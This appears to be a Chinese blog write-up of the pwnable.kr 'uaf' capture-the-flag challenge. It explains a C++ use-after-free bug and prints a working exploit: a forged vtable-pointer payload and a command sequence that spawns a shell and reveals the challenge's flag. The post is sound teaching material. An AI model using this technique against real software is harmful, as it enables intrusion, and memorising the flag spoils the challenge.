Fork me on GitHub

pwnable.kr-uaf

发表于 | 更新于 | 分类于 | 评论数:

前言

这道题有了pwn的味道了,自己虽然以前学习过二进制漏洞方面的知识但是都是windows方面的(还是新手),对于linux系统下的安全机制和一些关键的技术仍然不熟悉,做这道题参考了别人的writeup,这篇writeup很详细,对我这样的新手来说很友好。

分析

先分析源码uaf.c

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
#include <fcntl.h>
#include <iostream> 
#include <cstring>
#include <cstdlib>
#include <unistd.h>
using namespace std;

class Human{
private:
	virtual void give_shell(){
		system("/bin/sh");
	}
protected:
	int age;
	string name;
public:
	virtual void introduce(){
		cout << "My name is " << name << endl;
		cout << "I am " << age << " years old" << endl;
	}
};

class Man: public Human{
public:
	Man(string name, int age){
		this->name = name;
		this->age = age;
        }
        virtual void introduce(){
		Human::introduce();
                cout << "I am a nice guy!" << endl;
        }
};

class Woman: public Human{
public:
        Woman(string name, int age){
                this->name = name;
                this->age = age;
        }
        virtual void introduce(){
                Human::introduce();
                cout << "I am a cute girl!" << endl;
        }
};

int main(int argc, char* argv[]){
	Human* m = new Man("Jack", 25);
	Human* w = new Woman("Jill", 21);

	size_t len;
	char* data;
	unsigned int op;
	while(1){
		cout << "1. use\n2. after\n3. free\n";
		cin >> op;

		switch(op){
			case 1:
				m->introduce();
				w->introduce();
				break;
			case 2:
				len = atoi(argv[1]);
				data = new char[len];
				read(open(argv[2], O_RDONLY), data, len);
				cout << "your data is allocated" << endl;
				break;
			case 3:
				delete m;
				delete w;
				break;
			default:
				break;
		}
	}

	return 0;	
}

整个逻辑简短分析。这是一个c++程序,定义了一个基类Human和继承的两个子类Woman,Man。其中关键的部分是基类中定义了两个虚函数get_shell,introducemain函数中先是定义了两个子类的对象,然后循环结构中有3个case,第一个分别调用了introduce函数,第二个分配一个用户指定大小的的内存并向里面写入用户指定的数据,第三个执行前面两个对象的销毁。
逻辑清楚了,漏洞在哪呢?根据题目提示,这存在一个uaf漏洞。

知识点

UAFUse-After-Free的缩写,也就是释放后重用漏洞。UAF漏洞的成因是一块堆内存被释放了之后又被使用。又被使用指的是:指针存在(“野”指针被引用)。这个引用的结果是不可预测的,因为不知道会发生什么。由于大多数的堆内存其实都是C++对象,所以利用的核心思路就是分配堆去占坑,占的坑中有自己构造的虚表。
uaf漏洞是一种内存破坏漏洞存在于各种操作系统中。对于本题来说,还要了解的技术如下

  • linux内存分配和释放策略
  • c++对象内存布局

对于这些参考搜索引擎即可,我找时间好好学习并总结一下(可以参考上面推荐的writeup)。

利用

了解了关键的技术接下来就是漏洞的利用。分析程序发现,只要先执行第三个case使对象释放,然后再重新申请同样大小的内存,那么根据linux内存的分配策略原先释放掉的对象内存就会被重新分配,这时再执行第一个case就会使用“野”指针执行虚函数调用。然而“野”指针指向的内存是由我控制的,于是就达到了利用的目的。然而本题由于有两个对象,且对象调用函数的顺序和内存先释放后分配的事实导致利用有些许改变,应该保证第一个对象(m)的函数调用不会引起异常,所以向内存中写入的数据以第一个对象为准。
利用流程就是case3->case2-case2->case1。利用思路就是改变虚表指针的值,使其指向虚表的前8个字节(因为get_shell是虚表中第一个函数,且题目系统是64位),从而使对象在调用introduce时调用get_shell而获得shell。所以getflag的关键就是找类Man的虚表。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
.rodata:0000000000401550 off_401550      dq offset _ZN5Human10give_shellEv
.rodata:0000000000401550                                         ; DATA XREF: Woman::Woman(std::string,int)+24o
.rodata:0000000000401550                                         ; Human::give_shell(void)
.rodata:0000000000401558                 dq offset _ZN5Woman9introduceEv ; Woman::introduce(void)
.rodata:0000000000401560                 public _ZTV3Man ; weak
.rodata:0000000000401560 ; `vtable for'Man
.rodata:0000000000401560 _ZTV3Man        db    0
.rodata:0000000000401561                 db    0
.rodata:0000000000401562                 db    0
.rodata:0000000000401563                 db    0
.rodata:0000000000401564                 db    0
.rodata:0000000000401565                 db    0
.rodata:0000000000401566                 db    0
.rodata:0000000000401567                 db    0
.rodata:0000000000401568                 db 0D0h ; 
.rodata:0000000000401569                 db  15h
.rodata:000000000040156A                 db  40h ; @
.rodata:000000000040156B                 db    0
.rodata:000000000040156C                 db    0
.rodata:000000000040156D                 db    0
.rodata:000000000040156E                 db    0
.rodata:000000000040156F                 db    0
.rodata:0000000000401570 off_401570      dq offset _ZN5Human10give_shellEv
.rodata:0000000000401570                                         ; DATA XREF: Man::Man(std::string,int)+24o
.rodata:0000000000401570                                         ; Human::give_shell(void)
.rodata:0000000000401578                 dq offset _ZN3Man9introduceEv ; Man::introduce(void)
.rodata:0000000000401580                 public _ZTV5Human ; weak
.rodata:0000000000401580 ; `vtable for'Human
.rodata:0000000000401580 _ZTV5Human      db    0

在ida中可以发现Man类的虚表地址是0x401550,然后就有了下面的利用过程

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
uaf@ubuntu:~$ python -c "print '\x48\x15\x40'+'\x00'*21" >/tmp/poc
uaf@ubuntu:~$ ./uaf 24 /tmp/poc
1. use
2. after
3. free
3
1. use
2. after
3. free
2
your data is allocated
1. use
2. after
3. free
2
your data is allocated
1. use
2. after
3. free
1
$ cat flag
yay_f1ag_aft3r_pwning
$

总结

感觉做这道题有了pwn的感觉了,学到了很多linux内存管理方面的东西,同时也专门去了解了uaf漏洞的东西,收货很大。

-------------本文结束感谢您的阅读-------------

本文标题:pwnable.kr-uaf

文章作者:r00tnb

发布时间:2018年01月29日 - 21:01

最后更新:2018年08月04日 - 22:08

原始链接:https://r00tnb.github.io/2018/01/29/pwnable.kr-uaf/

许可协议: 署名-非商业性使用-禁止演绎 4.0 国际 转载请保留原文链接及作者。

坚持原创,您的鼓励是我最大的动力!